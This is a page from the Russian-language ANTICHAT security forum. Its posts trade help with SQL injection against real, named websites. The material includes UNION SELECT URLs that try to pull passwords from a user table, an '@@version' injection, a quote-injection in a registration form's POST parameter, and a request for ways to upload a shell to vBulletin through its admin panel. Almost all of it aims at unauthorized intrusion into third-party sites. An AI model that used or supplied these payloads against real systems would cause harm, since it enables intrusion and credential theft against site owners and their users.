HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #14351  
Старый 13.07.2010, 17:25
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от Seravin  
Seravin said:
помогите кто с cfm
Код:
Code:
http://www.vaemergency.com/train/calendar_course.cfm?id=156
http://www.vaemergency.com/train/calendar_course.cfm?id=156+or+1=@@version

стандартная MS_SQL инъекция
 
Ответить с цитированием

  #14352  
Старый 13.07.2010, 17:53
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

Код:
Code:
http://www.wischamberfoundation.org/wcs/display.cfm?id=314+and+1=2+union+select+top+1+1,2,3,4,5,6,7,8,9,10,password,12,13,14,15,16,17,18,19,20,21+from+user
Какие идеи?
 
Ответить с цитированием

  #14353  
Старый 13.07.2010, 17:57
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от Seravin  
Seravin said:
Код:
Code:
http://www.wischamberfoundation.org/wcs/display.cfm?id=314+and+1=2+union+select+top+1+1,2,3,4,5,6,7,8,9,10,password,12,13,14,15,16,17,18,19,20,21+from+user
Какие идеи?
почитай статью sql инъекция в ms access

таблица user зарезервирована ты не можешь сделать запрос к этой таблице
 
Ответить с цитированием

  #14354  
Старый 13.07.2010, 19:06
AKYLA
Участник форума
Регистрация: 29.11.2007
Сообщений: 116
Провел на форуме:
283596

Репутация: 88
По умолчанию

Есть вроде как уязвимость в Явовом сайте в пост параметре terms

Работает как через http так и через https

Цитата:
Сообщение от None  
http://www.parship.de/profile/registration
forceDuplicatedEmail=false&mysex=1&essex=1&email=s ample%40email%2Etst&password=test&passwordCheck=1& terms=%2527
Но так как я с явой не имел дело, не имею понятия как с ним обращаться, может кто подскажет?
 
Ответить с цитированием

  #14355  
Старый 13.07.2010, 22:33
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014

Репутация: 8
По умолчанию

Цитата:
Сообщение от R0nin  
R0nin said:
Ты даже не знаешь как выглядет формат IPv4, иди вот тут прочитай http://en.wikipedia.org/wiki/IPv4 что это такое, а я тебе потом помогу настроить твой hosts.
Прочитал, и не понял где моя ошибка.

Давай настроим файл hosts для локального сервера. По дефолту там прописано:

127.0.0.1 localhost

Заменим слово "localhost" на "local.net"

127.0.0.1 local.net

Набираем в браузере http://local.net

Браузер выводит:

Error!

Could not locate remote server

Что можете предложить, чтобы локальный сервер заработал по этому адресу?
 
Ответить с цитированием

  #14356  
Старый 13.07.2010, 22:35
seofilms
Участник форума
Регистрация: 27.05.2009
Сообщений: 115
Провел на форуме:
2312554

Репутация: 97
По умолчанию

Есть ли способы залить шелл в (vBulletin 3.8.4) через админку администратора (не глав. администратора) ?

Если кто знает, дайте пожалуйста ссылку на видео или статью, спасибо.
 
Ответить с цитированием

  #14357  
Старый 13.07.2010, 22:47
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от FlaktW  
FlaktW said:
Прочитал, и не понял где моя ошибка.
www.google.ru 1111.2222.3333.4444

где ты видел такие IP адреса?
 
Ответить с цитированием

  #14358  
Старый 13.07.2010, 23:10
Anexroid
Новичок
Регистрация: 22.08.2009
Сообщений: 7
Провел на форуме:
23465

Репутация: 1
По умолчанию

Помогите с SQL-Inj, пожалуйста.

Подобрал кол-во столбцов, запросом

1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*

Узнал данные о сервере

PHP Version 5.2.10

System FreeBSD fe61.hc.ru 6.2-RELEASE-p3 FreeBSD 6.2-RELEASE-p3 #2: Thu Apr 12 13:46:06 MSD 2007 root@fe25.hw.ru:/usr/obj/usr/src/sys/XEON i386

Mysql Client API version 4.1.22

Apache/1.3.34 (Unix)

Нашел багу:

site.ru/index.php?id=1'

Выдаёт

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in ****

Что еще можно вытянуть? и как? Подскажите, плз
 
Ответить с цитированием

  #14359  
Старый 13.07.2010, 23:14
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404

Репутация: 564
Отправить сообщение для shell_c0de с помощью ICQ Отправить сообщение для shell_c0de с помощью AIM
По умолчанию

смотрю что то очень страшные вопросы пошли =\

2Anexroid найти принтабельное поле и ..... прочитать это /thread43966.html и что то сделать своим умом ...

2f137ch линк в ПМ помогу с раскруткой а то тут телепаты в отпуске ...
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
 
Ответить с цитированием

  #14360  
Старый 13.07.2010, 23:34
Anexroid
Новичок
Регистрация: 22.08.2009
Сообщений: 7
Провел на форуме:
23465

Репутация: 1
По умолчанию

Спс, нашел поле `email` только. =( Но за линк спс.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ